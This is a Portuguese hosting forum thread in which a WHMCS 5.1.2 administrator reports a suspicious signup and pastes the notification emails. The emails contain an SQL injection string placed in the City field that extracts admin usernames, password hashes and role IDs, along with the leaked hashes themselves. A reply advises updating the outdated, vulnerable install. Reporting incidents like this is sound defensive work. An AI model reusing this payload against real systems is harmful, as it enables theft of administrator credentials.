Robert Birschener Postado Outubro 12, 2013 Compartilhar Postado Outubro 12, 2013 Olá pessoa, boa tarde. Hoje recebi um cadastro um tanto estranho no WHMCS, cadastro com letras repetidas (nome: fdgdfgd), email inválido, etc. Depois de cadastrar a pessoa alterou alguns campos, abaixou segue o primeiro e segundo email respectivamente do whmcs notificando a mudança: Client ID: 1422 - aaadsfsdfsdf fgfdg has requested to change his/her details as indicated below: City: 'fghfgh' to 'AES_ENCRYPT(1,1), address2=(SELECT * FROM (SELECT group_concat(username,0x3a,password,0x3a,roleid) FROM tbladmins) as x)' If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details. #################################################### Client ID: 1422 - aaadsfsdfsdf fgfdg has requested to change his/her details as indicated below: Address 2: 'NOME_DE_USUARIO:321bbdfaf845a62a42ec2dea17214bca:1,NOME_DE_USUARIO:1d5d56f61db6e03b6fc42bc3a168ac36:1,NOME_DE_USUARIO:23c084ac7681a1eeea72093d8a844806:3' to 'aaa' City: 'OµÜÿ(%ϱT*Cé9' to 'aaa' If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details. Sendo que no segundo email onde eu coloquei escrito NOME_DE_USUARIO são os usuários do meu WHMCS, fiquei bastante preocupado com isso. Já alterei todas as senhas por precaução, mas gostaria de saber se já aconteceu com alguém e se tem alguma solução, a minha versão do WHMCS é a 5.1.2. Link para o comentário Compartilhar em outros sites More sharing options...
avonni Postado Outubro 12, 2013 Compartilhar Postado Outubro 12, 2013 Teu WHMCS está desatualizado e vulnerável: http://portaldohost.com.br/forum/index.php?showtopic=13514 Faça a atualização dele o quanto antes. 1 Link para o comentário Compartilhar em outros sites More sharing options...
Julianodls Postado Outubro 13, 2013 Compartilhar Postado Outubro 13, 2013 è isso ai amigo ISAA falo tudo.. -1 Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados